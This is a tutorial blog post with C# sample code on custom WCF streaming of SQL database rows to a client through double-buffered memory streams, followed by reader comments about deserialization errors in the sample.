VM will reach the OpenStack router’s gateway and, from the gateway, the packets get embedded with the registered MAC address. Hence, the matching IP address will reach the AWS switch (VPC environment) via br-ex and eth1 (our special interface configuration) and then hits the AWS VPC gateway. From there, the packets will reach the Internet. Other Cloud Platforms In my analysis, I could see most cloud providers like Dreamhost or Auro-cloud having the same limitations for OpenStack networking. So we could use the tricks/hacks mentioned above in any of those cloud providers to run an OpenStack cloud on top of it. Note: Since we are using a QEMU emulator without KVM for the nested hypervisor environment, the VM performance will be slow. }}
https://dzone.com/articles/deploying-openstack-on-aws
CC-MAIN-2019-04
refinedweb
1,096
61.16
IO (Scala) Introduction This documentation is in progress and some sections may be incomplete. More will be coming. Components ByteString A primary goal of Akka's IO support is to only communicate between actors with immutable objects. When dealing with network IO on the jvm Array[Byte] and ByteBuffer are commonly used to represent collections of Bytes, but they are mutable. Scala's collection library also lacks a suitably efficient immutable collection for Bytes. Being able to safely and efficiently move Bytes around is very important for this IO support, so ByteString was developed. ByteString is a Rope-like data structure that is immutable and efficient. When 2 it's own optimized builder and iterator classes ByteStringBuilder and ByteIterator which provides special features in addition to the standard builder / iterator methods: Compatibility with java.io A ByteStringBuilder can be wrapped in a java.io.OutputStream via the asOutputStream method. Likewise, ByteIterator can we wrapped in a java.io.InputStream via asInputStream. Using these, akka.io applications can integrate legacy code based on java.io streams. Encoding and decoding of binary data ByteStringBuilder and ByteIterator support encoding and decoding of binary data. As an example, consider a stream of binary data frames with the following format: frameLen: Int n: Int m: Int n times { a: Short b: Long } data: m times Double In this example, the data is to be stored in arrays of a, b and data. Decoding of such frames can be efficiently implemented in the following fashion: implicit val byteOrder = java.nio.ByteOrder.BIG_ENDIAN val FrameDecoder = for { frameLenBytes ← IO.take(4) frameLen = frameLenBytes.iterator.getInt frame ← IO.take(frameLen) } yield { val in = frame.iterator val n = in.getInt val m = in.getInt val a = Array.newBuilder[Short] val b = Array.newBuilder[Long] for (i ← 1 to n) { a += in.getShort b += in.getInt } val data = Array.ofDim[Double](m) in.getDoubles(data) (a.result, b.result, data) } This implementation naturally follows the example data format. In a true Scala application, one might, of course, want use specialized immutable Short/Long/Double containers instead of mutable Arrays. After extracting data from a ByteIterator, the remaining content can also be turned back into a ByteString using the toSeq method val n = in.getInt val m = in.getInt // ... in.get... val rest: ByteString = in.toSeq with no copying from bytes to rest involved. In general, conversions from ByteString to ByteIterator and vice versa are O(1) for non-chunked ByteStrings and (at worst) O(nChunks) for chunked ByteStrings. Encoding of data also is very natural, using ByteStringBuilder implicit val byteOrder = java.nio.ByteOrder.BIG_ENDIAN val a: Array[Short] val b: Array[Long] val data: Array[Double] val frameBuilder = ByteString.newBuilder val n = a.length val m = data.length frameBuilder.putInt(n) frameBuilder.putInt(m) for (i ← 0 to n - 1) { frameBuilder.putShort(a(i)) frameBuilder.putLong(b(i)) } frameBuilder.putDoubles(data) val frame = frameBuilder.result() The encoded data then can be sent over socket (see IOManager): val socket: IO.SocketHandle socket.write(ByteString.newBuilder.putInt(frame.length).result) socket.write(frame) IO.Handle IO.Handle is an immutable reference to a Java NIO Channel. Passing mutable Channels between Actors could lead to unsafe behavior, so instead subclasses of the IO.Handle trait are used. Currently there are 2 concrete subclasses: IO.SocketHandle (representing a SocketChannel) and IO.ServerHandle (representing a ServerSocketChannel). IOManager The IOManager takes care of the low level IO details. Each ActorSystem has it's own IOManager, which can be accessed calling IOManager(system: ActorSystem). Actors communicate with the IOManager with specific messages. The messages sent from an Actor to the IOManager are handled automatically when using certain methods and the messages sent from an IOManager are handled within an Actor's receive method. Connecting to a remote host: val address = new InetSocketAddress("remotehost", 80) val socket = IOManager(actorSystem).connect(address) val socket = IOManager(actorSystem).connect("remotehost", 80) Creating a server: val address = new InetSocketAddress("localhost", 80) val serverSocket = IOManager(actorSystem).listen(address) val serverSocket = IOManager(actorSystem).listen("localhost", 80) Receiving messages from the IOManager: def receive = { case IO.Listening(server, address) => println("The server is listening on socket " + address) case IO.Connected(socket, address) => println("Successfully connected to " + address) case IO.NewClient(server) => println("New incoming connection on server") val socket = server.accept() println("Writing to new client socket") socket.write(bytes) println("Closing socket") socket.close() case IO.Read(socket, bytes) => println("Received incoming data from socket") case IO.Closed(socket: IO.SocketHandle, cause) => println("Socket has closed, cause: " + cause) case IO.Closed(server: IO.ServerHandle, cause) => println("Server socket has closed, cause: " + cause) } IO.Iteratee Included with Akka's IO support is a basic implementation of Iteratees. Iteratees are an effective way of handling a stream of data without needing to wait for all the data to arrive. This is especially useful when dealing with non blocking IO since we will usually receive data in chunks which may not include enough information to process, or it may contain much more data than we currently need. This Iteratee implementation is much more basic than what is usually found. There is only support for ByteString input, and enumerators aren't used. The reason for this limited implementation is to reduce the amount of explicit type signatures needed and to keep things simple. It is important to note that Akka's Iteratees are completely optional, incoming data can be handled in any way, including other Iteratee libraries. Iteratees work by processing the data that it is given and returning either the result (with any unused input) or a continuation if more input is needed. They are monadic, so methods like flatMap can be used to pass the result of an Iteratee to another. The basic Iteratees included in the IO support can all be found in the ScalaDoc under akka.actor.IO, and some of them are covered in the example below. Examples Http Server This example will create a simple high performance HTTP server. We begin with our imports: import akka.actor._ import akka.util.{ ByteString, ByteStringBuilder } import java.net.InetSocketAddress Some commonly used constants: object HttpConstants { val SP = ByteString(" ") val HT = ByteString("\t") val CRLF = ByteString("\r\n") val COLON = ByteString(":") val PERCENT = ByteString("%") val PATH = ByteString("/") val QUERY = ByteString("?") } And case classes to hold the resulting request: case class Request(meth: String, path: List[String], query: Option[String], httpver: String, headers: List[Header], body: Option[ByteString]) case class Header(name: String, value: String) Now for our first Iteratee. There are 3 main sections of a HTTP request: the request line, the headers, and an optional body. The main request Iteratee handles each section separately: object HttpIteratees { import HttpConstants._ def readRequest = for { requestLine ← readRequestLine (meth, (path, query), httpver) = requestLine headers ← readHeaders body ← readBody(headers) } yield Request(meth, path, query, httpver, headers, body) In the above code readRequest takes the results of 3 different Iteratees (readRequestLine, readHeaders, readBody) and combines them into a single Request object. readRequestLine actually returns a tuple, so we extract it's individual components. readBody depends on values contained within the header section, so we must pass those to the method. The request line has 3 parts to it: the HTTP method, the requested URI, and the HTTP version. The parts are separated by a single space, and the entire request line ends with a CRLF. def ascii(bytes: ByteString): String = bytes.decodeString("US-ASCII").trim def readRequestLine = for { meth ← IO takeUntil SP uri ← readRequestURI _ ← IO takeUntil SP // ignore the rest httpver ← IO takeUntil CRLF } yield (ascii(meth), uri, ascii(httpver)) Reading the request method is simple as it is a single string ending in a space. The simple Iteratee that performs this is IO.takeUntil(delimiter: ByteString): Iteratee[ByteString]. It keeps consuming input until the specified delimiter is found. Reading the HTTP version is also a simple string that ends with a CRLF. The ascii method is a helper that takes a ByteString and parses it as a US-ASCII String. Reading the request URI is a bit more complicated because we want to parse the individual components of the URI instead of just returning a simple string: def readRequestURI = IO peek 1 flatMap { case PATH ⇒ for { path ← readPath query ← readQuery } yield (path, query) case _ ⇒ sys.error("Not Implemented") } For this example we are only interested in handling absolute paths. To detect if we the URI is an absolute path we use IO.peek(length: Int): Iteratee[ByteString], which returns a ByteString of the request length but doesn't actually consume the input. We peek at the next bit of input and see if it matches our PATH constant (defined above as ByteString("/")). If it doesn't match we throw an error, but for a more robust solution we would want to handle other valid URIs. Next we handle the path itself: def readPath = { def step(segments: List[String]): IO.Iteratee[List[String]] = IO peek 1 flatMap { case PATH ⇒ IO drop 1 flatMap (_ ⇒ readUriPart(pathchar) flatMap ( segment ⇒ step(segment :: segments))) case _ ⇒ segments match { case "" :: rest ⇒ IO Done rest.reverse case _ ⇒ IO Done segments.reverse } } step(Nil) } The step method is a recursive method that takes a List of the accumulated path segments. It first checks if the remaining input starts with the PATH constant, and if it does, it drops that input, and returns the readUriPart Iteratee which has it's result added to the path segment accumulator and the step method is run again. If after reading in a path segment the next input does not start with a path, we reverse the accumulated segments and return it (dropping the last segment if it is blank). Following the path we read in the query (if it exists): def readQuery: IO.Iteratee[Option[String]] = IO peek 1 flatMap { case QUERY ⇒ IO drop 1 flatMap (_ ⇒ readUriPart(querychar) map (Some(_))) case _ ⇒ IO Done None } It is much simpler than reading the path since we aren't doing any parsing of the query since there is no standard format of the query string. Both the path and query used the readUriPart Iteratee, which is next: val alpha = Set.empty ++ ('a' to 'z') ++ ('A' to 'Z') map (_.toByte) val digit = Set.empty ++ ('0' to '9') map (_.toByte) val hexdigit = digit ++ (Set.empty ++ ('a' to 'f') ++ ('A' to 'F') map (_.toByte)) val subdelim = Set('!', '$', '&', '\'', '(', ')', '*', '+', ',', ';', '=') map (_.toByte) val pathchar = alpha ++ digit ++ subdelim ++ (Set(':', '@') map (_.toByte)) val querychar = pathchar ++ (Set('/', '?') map (_.toByte)) def readUriPart(allowed: Set[Byte]): IO.Iteratee[String] = for { str ← IO takeWhile allowed map ascii pchar ← IO peek 1 map (_ == PERCENT) all ← if (pchar) readPChar flatMap (ch ⇒ readUriPart(allowed) map (str + ch + _)) else IO Done str } yield all def readPChar = IO take 3 map { case Seq('%', rest @ _*) if rest forall hexdigit ⇒ java.lang.Integer.parseInt(rest map (_.toChar) mkString, 16).toChar } Here we have several Sets that contain valid characters pulled from the URI spec. The readUriPart method takes a Set of valid characters (already mapped to Bytes) and will continue to match characters until it reaches on that is not part of the Set. If it is a percent encoded character then that is handled as a valid character and processing continues, or else we are done collecting this part of the URI. Headers are next: def readHeaders = { def step(found: List[Header]): IO.Iteratee[List[Header]] = { IO peek 2 flatMap { case CRLF ⇒ IO takeUntil CRLF flatMap (_ ⇒ IO Done found) case _ ⇒ readHeader flatMap (header ⇒ step(header :: found)) } } step(Nil) } def readHeader = for { name ← IO takeUntil COLON value ← IO takeUntil CRLF flatMap readMultiLineValue } yield Header(ascii(name), ascii(value)) def readMultiLineValue(initial: ByteString): IO.Iteratee[ByteString] = IO peek 1 flatMap { case SP ⇒ IO takeUntil CRLF flatMap ( bytes ⇒ readMultiLineValue(initial ++ bytes)) case _ ⇒ IO Done initial } And if applicable, we read in the message body: def readBody(headers: List[Header]) = if (headers.exists(header ⇒ header.name == "Content-Length" || header.name == "Transfer-Encoding")) IO.takeAll map (Some(_)) else IO Done None Finally we get to the actual Actor: class HttpServer(port: Int) extends Actor { val state = IO.IterateeRef.Map.async[IO.Handle]()(context.dispatcher) override def preStart { IOManager(context.system) listen new InetSocketAddress(port) } def receive = { case IO.NewClient(server) ⇒ val socket = server.accept() state(socket) flatMap (_ ⇒ HttpServer.processRequest(socket)) case IO.Read(socket, bytes) ⇒ state(socket)(IO Chunk bytes) case IO.Closed(socket, cause) ⇒ state(socket)(IO EOF) state -= socket } } And it's companion object: object HttpServer { import HttpIteratees._ def processRequest(socket: IO.SocketHandle): IO.Iteratee[Unit] = IO repeat { for { request ← readRequest } yield { val rsp = request match { case Request("GET", "ping" :: Nil, _, _, headers, _) ⇒ OKResponse(ByteString("<p>pong</p>"), request.headers.exists { case Header(n, v) ⇒ n.toLowerCase == "connection" && v.toLowerCase == "keep-alive" }) case req ⇒ OKResponse(ByteString("<p>" + req.toString + "</p>"), request.headers.exists { case Header(n, v) ⇒ n.toLowerCase == "connection" && v.toLowerCase == "keep-alive" }) } socket write OKResponse.bytes(rsp).compact if (!rsp.keepAlive) socket.close() } } } And the OKResponse: object OKResponse { import HttpConstants.CRLF val okStatus = ByteString("HTTP/1.1 200 OK") val contentType = ByteString("Content-Type: text/html; charset=utf-8") val cacheControl = ByteString("Cache-Control: no-cache") val date = ByteString("Date: ") val server = ByteString("Server: Akka") val contentLength = ByteString("Content-Length: ") val connection = ByteString("Connection: ") val keepAlive = ByteString("Keep-Alive") val close = ByteString("Close") def bytes(rsp: OKResponse) = { new ByteStringBuilder ++= okStatus ++= CRLF ++= contentType ++= CRLF ++= cacheControl ++= CRLF ++= date ++= ByteString(new java.util.Date().toString) ++= CRLF ++= server ++= CRLF ++= contentLength ++= ByteString(rsp.body.length.toString) ++= CRLF ++= connection ++= (if (rsp.keepAlive) keepAlive else close) ++= CRLF ++= CRLF ++= rsp.body result } } case class OKResponse(body: ByteString, keepAlive: Boolean) A main method to start everything up: object Main extends App { val port = Option(System.getenv("PORT")) map (_.toInt) getOrElse 8080 val system = ActorSystem() val server = system.actorOf(Props(new HttpServer(port))) } Contents
http://doc.akka.io/docs/akka/2.1.0/scala/io.html
CC-MAIN-2015-18
refinedweb
2,306
50.33
Computing an electricity bill involves calculating the number of units consumed and allocating them to a variety of tariffs. Tariffs are based on two components - a standing charge and a price per unit. There may be more than one price range - perhaps the first 50 units are charged at a higher rate than subsequent units. Given that the initial tariffs offered are: Customers must choose the tariff they wish to be charged under. Design a program that accepts the number of units consumed and reports the most economic tariff. C++. #include <stdio.h> #include <stdlib.h> using namespace std; // iUnits = The total amount of units consumed // fStart = The standing charge // fSwitch = The amount that electricity switches to lower rate // fStandardRate = The high rate that applies to the first units // fLowRate = The low rate that applies to subsequent units float ic_CalculateCost(int iUnits, float fStart, float fSwitch, float fStandardRate, float fLowRate=0) { // stores the total float fCost = fStart; // work out the price for this tariff // see if they used enough units to use both brackets if (fSwitch && iUnits > fSwitch) { // the first few units are at standard rate fCost += fSwitch * fStandardRate; // remaining units at low rate fCost += (iUnits - fSwitch) * fLowRate; } else // all units at standard rate fCost += iUnits * fStandardRate; // return the total price return fCost; } int main(int argc, char *argv[]) { // convert the units to a number and store int iUnits = atoi(argv[1]); // this stores the prices for each company float fPrices[2]; // work out the price for tariff a fPrices[0] = ic_CalculateCost(iUnits, 10, 80, 0.105, 0.03); // work out the price for tariff b fPrices[1] = ic_CalculateCost(iUnits, 3, 250, 0.1, 0.075); // work out the price for tariff c fPrices[2] = ic_CalculateCost(iUnits, 0, 0, 0.125); // show all the total prices printf("Tariff A: %c%.2f\nTariff B: %c%.2f\nTariff C: %c%.2f", 156, fPrices[0], 156, fPrices[1], 156, fPrices[2]); } Excel formulas. Tariff A: =IF(A1 > 80, 10 + (80 * 0.105) + ((A1 - 80) * 0.03), 10 + (A1 * 0.105)) Tariff B: =IF(A1 > 250, 3 + (250 * 0.1) + ((A1 - 250) * 0.075), 3 + (A1 * 0.1)) Tariff C: =A1*0.125 The formulas above were then used to construct the following chart: Tariff C is the best choice for less than 120 units. Tariff B is the best choice for 120 to 190 units. Tariff A is the best choice for more than 190 units.
http://iceyboard.no-ip.org/projects/littleredbook/4/6
CC-MAIN-2018-17
refinedweb
403
72.26
libtungsten is a simple and open-source library designed to help you program ARM Cortex microcontrollers. Let's talk about some key aspects : Open source is more than just a license, it's a mindset. Unlike some other popular libraries, the code of libtungsten isn't hidden deep inside the OS, trying to keep beginners and hackers from seeing it : instead, it is available right there in your project folder, inviting you to see how it works and to customize it to fit your needs. Microcontroller programming can sometimes look a bit like dark magic to beginners in the way software is able to interract with hardware. « What's inside this digitalWrite() function that allows it to act on my electrical circuit and light up this LED? » is the kind of question most programmers ask themselves at least once. libtungsten provides easily accessible and well-documented code that you can simply go read if you want to learn more. The documentation also features in-depth tutorials explaining the internal workings of the microcontroller as well as how to read the datasheets. All these resources are here so you can truly learn how things work. Keeping a copy of the library inside each project also means that it can be customized for each application. Found the perfect sensor for your project but it requires unusual I2C settings? Not a problem, just open the i2c.cpp driver and customize it to fit your needs. Want to control a strip of WS2812 RGB LEDs without wasting tons of CPU cycles? Write a custom driver based on spi.cpp to use the SPI controller and the DMA. Need to use the SysTick system timer for an advanced application-specific purpose? Just open core.cpp and customize it at will. To get you started, the documentation of each module contains a Hacking section giving tips and ideas about what can be customized. By the way, if you cloned the library from the Git repository and you want to update it, don't worry, Git will be able to merge your changes in the new version. In order to keep things simple libtungsten does not try to be generic and portable across lots of microcontrollers; instead, it is dedicated to the ATSAM4L line of microcontrollers from Atmel/Microchip. These microcontrollers come in a range of sizes (48, 64 and 100 pins), packages (TQFP, VFBGA, WLCSP and QFN), and memory density (32Kb RAM / 128Kb Flash, 32Kb RAM / 256Kb Flash and 64Kb RAM / 512Kb Flash). They are based on the Cortex M4 architecture, can run up to 48MHz, have a lot of optimizations for low-power design and come with loads of interesting peripherals, such as : Obviously, in order to program a microcontroller, a library is not enough : you need a board equipped with the microcontroller in question. You have basically three options, from easiest to hardest : libtungsten is released under the permissive Apache 2.0 license, which basically means that you can use the library freely for personnal and commercial use. More information about this on the official page, or on TLDRLegal for a more digestible version. libtungsten adopts the Unix philosophy stating that a tool should do only one thing, but do it well. In that perspective, it doesn't offer an IDE but instead invites you to use the text editor of your choice, whether it is console-based (vim, emacs... in no particular order) or GUI-based (Sublime Text, ...). Compiling and flashing code is done using a simple Makefile and OpenOCD (by default, you can use something else if you prefer). The library aims to be as light, simple and straightforward as possible : namespace, and functions are accessed with the standard scope resolution operator : Module::function() Most of the microcontroller's peripherals offer powerful but complex features which can be optimized in very specific situations. To keep things simple, the library doesn't try to accomodate every possible case; instead, you are free to customize the modules to fit your needs.
https://libtungsten.io/overview
CC-MAIN-2019-22
refinedweb
667
60.04
RE: CLR 1.1 SP1 destroys System.Management code From: Manfred Braun (ManfredBraun_at_discussions.microsoft.com) Date: 10/13/04 - ] Date: Wed, 13 Oct 2004 10:49:08 -0700 Hello Blair, after I discovered [see my other response], that this is clearly a CLR problem, what type of ongoing can I expect? I have to ensure, that my application continues working even with SP1. Would be nice to hear more infos. Thanks so far and best regards, Manfred "Blair Neumann [MSFT]" wrote: > Hello Manfred. > > Sorry to hear about your problems running System.Management code on NDP 1.1 > SP1! Unfortunately, I cannot assist you in debugging your application. > However you also asked how to remove NDP 1.1 SP1 which is something that I > may be able to help you with. As you observe, it's not as simple as > Add/Remove Programs. > > Note that what you call CLR 1.1, I call NDP 1.1. I believe we are talking > about the same thing: the .NET Framework 1.1 and its associated Service > Pack 1. > > Assuming you are running on a platform other than Windows Server 2003, NDP > 1.1 SP1 will not show up in Add/Remove Programs. (If you are running on > 32-bit versions of Windows Server 2003 then NDP 1.1 SP1 should be in > Add/Remove Programs as "KB867460". You can simply uninstall it there.) > Instead, you can revert to pre-SP1 levels by uninstalling the .NET > Framework from Add/Remove Programs and then re-installing the .NET > Framework. Unfortunately, we do not support the explicit uninstall of .NET > Framework service packs except on specific platforms such as Windows Server > 2003 (these platforms contain the .NET Framework as pre-installed Windows > components); you must uninstall the .NET Framework itself, then re-install > it without re-installing the Service Pack. In this case, you would simply > uninstall and then re-install the .NET Framework 1.1. > > You can get the .NET Framework 1.1 from this URL: >- > 8157-034d1e7cf3a3&displaylang=en > > Note that you must also re-install any hotfixes that you may have had after > re-installing the .NET Framework. Many customers do not have any .NET > Framework hotfixes installed, but if you do then you will need to replace > them. Unlike service packs, .NET Framework hotfixes do show up in > Add/Remove programs, so you can see which NDP 1.1 hotfixes you have > installed by checking Add/Remove Programs prior to uninstalling .NET > Framework 1.1. .NET Framework hotfix entries in Add/Remove Programs > typically look like this: "Microsoft .NET Framework 1.1 Hotfix (KBxxxxxx)". > If you do not still have the hotfix executable for re-install, you should > be able to get it again from the same source who provided it for you the > first time: for example, from your OEM or from the Microsoft Download > Center (). > > I hope this helps! > > Best wishes. > -Blair. > > -------------------- > > Subject: CLR 1.1 SP1 destroys System.Management code > > Date: Sat, 9 Oct 2004 07:03:05 -0700 > > > > Hi All, > > after I installed the SP1 on CLR1.1, my code using System.Management is > no > > longer working. My code worked the whole time until SP1 and is as follows: > > > > //mewSP1Test1.cs > > > > using System; > > using System.Management; > > > > public class Test > > { > > > > public static void Main() > > { > > ManagementEventWatcher mew; > > ConnectionOptions co; > > ManagementPath mp; > > ManagementScope ms; > > WqlEventQuery weq; > > > > co = new ConnectionOptions(); > > co.EnablePrivileges = true; > > > > co.Impersonation = ImpersonationLevel.Impersonate; > > co.Authentication = AuthenticationLevel.Connect; > > > > mp = new ManagementPath(); > > mp.NamespacePath = @"\root\cimv2"; > > mp.Server = "m1"; > > > > ms = new ManagementScope(mp, co); > > > > weq = new WqlEventQuery("select * from __InstanceCreationEvent where > > (TargetInstance isa 'Win32_NTLogEvent') and (TargetInstance.Logfile <> > > 'Security')"); > > > > mew = new ManagementEventWatcher(ms, weq); > > mew.EventArrived += new > EventArrivedEventHandler(OnEventlogEventArrived); > > mew.Start(); > > Console.WriteLine("Waiting for events...."); > > Console.ReadLine(); > > } > > > > private static void OnEventlogEventArrived(object sender, > > EventArrivedEventArgs e) > > { > > //This is the eventhandler for the returned WMI results. > > > > string msg; > > > > > > //Get the wmi-event > > > > ManagementBaseObject mbo; > > mbo = (ManagementBaseObject)e.NewEvent["TargetInstance"]; > > > > try > > { > > msg = ((string) mbo["Message"]).Trim(); > > Console.WriteLine(msg); > > } > > catch(Exception ex) > > { > > Console.WriteLine("Exception:{0}", ex.ToString()); > > } > > > > Console.WriteLine(new String('-', 79)); > > } > > > > } > > > > How to fix the bug? > > How to uninstall SP1, it is not listed under software! > > > > Any help would be wonderful! > > Thanks and best regards, > > Manfred Bra ]
http://www.tech-archive.net/Archive/DotNet/microsoft.public.dotnet.framework.setup/2004-10/0102.html
crawl-002
refinedweb
696
62.34
Difference between thresholding function Hi Guys I have two set of codes for thresholding Code 1 import cv2 import numpy as np Image = cv2.imread('blue.jpg') Threshold = np.zeros(Image.shape, np.uint8) cv2.threshold(Image, 121, 255, cv2.THRESH_BINARY, Threshold) cv2.imshow("WindowName", Threshold ) cv2.waitKey(0) cv2.destroyAllWindows() and Code 2 import cv2 import numpy as np Image = cv2.imread('blue.jpg') ret, thresh = cv2.threshold(Image, 121, 255, cv2.THRESH_BINARY) cv2.imshow("WindowName", thresh ) cv2.waitKey(0) cv2.destroyAllWindows() What is the difference between these two thresh functions There shouldn't be a difference in the resulting image. You have two possibilities in python to call the function. Do you see any differences? output image has no difference. but there is little bit change in syntax
http://answers.opencv.org/question/87743/difference-between-thresholding-function/
CC-MAIN-2019-13
refinedweb
130
55.5
test.h File Reference Utility for the test suite. More... #include "cfg/cfg_arch.h" Go to the source code of this file. Detailed Description Utility for the test suite. - Version: When you want to test a module that is emulable on hosted platforms, these macros come in handy. Your module_test should supply three basic functions: int module_testSetup(void) int module_testRun(void) int module_testTearDown(void) All of these should return 0 if ok or a value != 0 on errors. Then, at the end of your module_test you can write: #if UNIT_TEST #include <whatuneed.h> #include <whatuneed.c> #include <...> TEST_MAIN(module); #endif Including directly into your module the file.c you need to run the test allows you to build and run the test compiling only one file. To achieve this you also need a main() that is supplied by the TEST_MAIN macro. This will expand to a full main that calls, in sequence: Setup, Run and TearDown of your module. Definition in file test.h. Define Documentation Silent an assert in a test. This is useful when we run a test and we want to test an error condition. We know that an assert will fail but this is not really an error. To ignore that we mark it with this macro, where str is the message string of the assert that we want to drop. To use this macro copy the assert log message and paste as argument of this macro. In assert message log is reported also the line number of the code that have generated the assert. In this way you can trap only the selected assert message. Definition at line 116 of file test.h.
http://doc.bertos.org/2.5/test_8h.html
crawl-003
refinedweb
278
75.5
Complete Source code is available at code.msdn.microsoft.com Many distributed business applications work with huge number of database rows, transferring large number of record sets to multiple processes running on different machines. And most likely these large dataset are generated using complex and long running database queries. To improve data transfer performance for these type of business applications, we can use custom WCF streaming. Here is a sample that shows how to implement custom WCF Streaming. This sample code streams database records to client. Basic idea is : we will have two threads, one thread will execute the complex database query and another thread will stream database rows to the clients. So we will alter the database query such that it returns only 1000 rows at time. And modify the WCF service to stream these 1000 rows to client. While WCF service is streaming database rows to the client, at the same time on a different thread, WCF Service will run the database query again to get the next 1000 rows. This way as soon as the WCF Service finishes streaming rows to the client, the next set of rows are available to stream to the client - WCF Client calling WCF service - WCF Service executing database query - Database returns dataset to WCF service - WCF Service response - Second database query executed by WCF service - WCF Stream response Lets start with the WCF Service Contract [ServiceContract] public interface IStockMarket { [OperationContract] Stream GetDBRowStream(); } Here we have one WCF Operation which returns Stream object. Next, lets review the Service Contract implementation public class StockMarket : IStockMarket { public Stream GetDBRowStream() { return new DBRowStream(); } } The WCF Service is creating a new custom Stream object and returns it to the client. Next, lets review the client code try { Stream s = proxy.GetDBRowStream(); IFormatter formatter = new BinaryFormatter(); OrderModel m; while (s.CanRead) { m = formatter.Deserialize(s) as OrderModel; Console.Write(string.Format("order ID is {0}\r\n", m.ID)); } } catch (System.Exception ex) { Console.WriteLine(ex.Message); } The client calls GetDBRowStream() on the WCF proxy object and continuously read the stream object till stream object return false for CanRead() Here, we are reading the content from the stream object. Using the BinaryFormatterwe are deserializing and converting into useable .NET Object of type OrderModel Lets review the OrderModel class [Serializable] public class OrderModel { public int ID; public int ParameterOne; public int ParameterTwo; public int ParameterThree; public int Results; } OrderModel is nothing but a database row. So in the client code, it is reading one database row at a time Now lets look at the DBRowStream object source code. public class DBRowStream : Stream { bool bCanRead = true; MemoryStream memStream1 = new MemoryStream(); MemoryStream memStream2 = new MemoryStream(); IFormatter formatter = new BinaryFormatter(); ….. ….. Note : This code is little bit complex as it is trying to return the stream object to the client and at the same time it is trying to executing the SQL query to get the next DataSet This class has two memory stream objects so that it can write on the first memory stream object when reading data from the database and it can read from the second memory stream object when it is streaming data to WCF Client. In the below image, “a” and “b” are the two memory stream objects. At the beginning we write to memory stream “a” while reading data from the database. Next, at step#4 we read data from memory stream “a” and write it to WCF client. At the same time on another thread, (step#5) we make another database query to get next set and write it to the memory stream “b” Now lets look at how this class fills these two memory stream object : after writing the first 10 database rows to memory stream object “a” , it will write the next 10 database rows to memory stream object “b”. While writing to “b” it will read data from “a” and send it to client. Binary formatter is used to serialize the database row. void DBThreadProc(object o) { SqlConnection con = null; SqlCommand com = null; try { con = new System.Data.SqlClient.SqlConnection("Server=.\\SQLEXPRESS;Initial Catalog=OrderDB;Integrated Security=SSPI"); com = new SqlCommand(); com.Connection = con; com.CommandText = "Select top 1000 * from Orders "; con.Open(); SqlDataReader sdr = com.ExecuteReader(); int count = 0; MemoryStream memStream = memStream1; memStreamWriteStatus = 1; readyToWriteToMemStream1.WaitOne(); while (sdr.Read()) { OrderModel model = new OrderModel(); model.ID = sdr.GetInt32(0); model.ParameterOne = sdr.GetInt32(1); model.ParameterTwo = sdr.GetInt32(2); model.ParameterThree = sdr.GetInt32(3); formatter.Serialize(memStream, model); count++; if (count > 10) { switch (memStreamWriteStatus) { case 1: // done writing to 1 { memStream1.Position = 0; readyToSendFromMemStream1.Set(); Console.Write("write 1 is done...waiting for 2\r\n"); readyToWriteToMemStream2.WaitOne(); Console.Write("done waiting for 2\r\n"); memStream = memStream2; memStream.Position = 0; memStreamWriteStatus = 2; break; } case 2: // done writing to 2 { memStream2.Position = 0; readyToSendFromMemStream2.Set(); Console.Write("write 2 is done...waiting for 1\r\n"); readyToWriteToMemStream1.WaitOne(); Console.Write("done waiting for 1\r\n"); memStream = memStream1; memStreamWriteStatus = 1; memStream.Position = 0; break; } } count = 0; } } bCanRead = false; } catch (System.Exception excep) { } } Now lets see the how this class is streaming database rows to the WCF client. This class overrides Read() function. This Read() is called by WCF framework to stream the data to the client. When the Read() is called, first it checks if there is any data left in the current memory stream object. If so, it will read the memory stream object and stream it to the client and return. When the Read() is called again, it will check which memory stream object “a” or “b” is available for reading and then reads data from that memory stream object and sends it to client. After reading the memory stream object, it will mark it as “available for write”. The above database function, will now write to this memory stream object. Once writing to the memory stream object is completed, it will mark it as “available for read”. The below stream read function, will now read from this memory stream object. MemoryStream memStream = null; public override int Read(byte[] buffer, int offset, int count) { if (memStream != null) { if (memStream.Position != memStream.Length) { return memStream.Read(buffer, offset, count); } else { switch (memStreamReadStatus) { case 0: { throw new Exception(); } case 1: { Console.Write("READ : done sending from 1\r\n"); readyToWriteToMemStream1.Set(); break; } case 2: { Console.Write("READ : done sending from 2\r\n"); readyToWriteToMemStream2.Set(); break; } } } } switch (memStreamReadStatus) { case 0: { Console.Write("READ : waiting for 1\r\n"); while (!readyToSendFromMemStream1.WaitOne(1000)) { if (!bCanRead) { buffer[offset] = 0; return 0; } } Console.Write("READ : done waiting for 1\r\n"); memStream = memStream1; memStreamReadStatus = 1; break; } case 1: { Console.Write("READ : waiting for 2\r\n"); //readyToSendFromMemStream2.WaitOne(); while (!readyToSendFromMemStream2.WaitOne(1000)) { if (!bCanRead) { buffer[offset] = 0; return 0; } } Console.Write("READ : done waiting for 2\r\n"); memStream = memStream2; memStreamReadStatus = 2; break; } case 2: { Console.Write("READ : waiting for 1\r\n"); //readyToSendFromMemStream1.WaitOne(); while (!readyToSendFromMemStream1.WaitOne(1000)) { if (!bCanRead) { buffer[offset] = 0; return 0; } } Console.Write("READ : done waiting for 1\r\n"); memStream = memStream1; memStreamReadStatus = 1; break; } } return memStream.Read(buffer, offset, count); } Where is the end ? Remember the client code: client will read from the stream object until the CanRead() function return false. At the server side, we set this value in this below function public override bool CanRead { get { return bCanRead; } } Complete Source Code Complete Source code is available at code.msdn.microsoft.com Really interesting article. Out of curiousity, each time I run it I get an error on the last element or two stating that the end of the stream was encountered before parsing was complete. I thought I possibly just needed to resposition the position of the stream to the first element, but I'm still receiving the error. Any ideas? Great article! Ryan Sorry for the delay. Thank you for downloading the sample. I just fixed the bug and uploaded it to the code.msdn.microsoft.com site. Due this bug, it was not pushing the last set of records to the client. No problem at all on the delay. I actually found that same issue of missing the last record when writing to the stream and fixed it as well. I've noticed that you're code and mine still ends up with an exception after the last row. It effectively never recognizes the change to the stream.CanRead property, tries to read another set of bytes, comes up with none, and my serializer throws an exception. For a test I simply set canread to false about half way through my dataset, and the client never sees the property changing. Any idea's why the client would never recognize the property CanRead as being false? By the way, I implemented this with a wpf based application we have using a dispatcher and background worker to keep the form responsive and it works really really well. I nearly have everything working, but I run in to this odd deserialization error everytime i run it, and I'm wondering if you've seen it. I basically make it say 100 rows through a 1000 row stream and it throws this consistently: The input stream is not a valid binary format. The starting contents (in bytes) are: 65-6E-74-69-76-65-20-4D-61-69-6E-74-65-6E-61-6E-63 …"} System.Exception {System.Runtime.Serialization.SerializationException} Do I need to enable 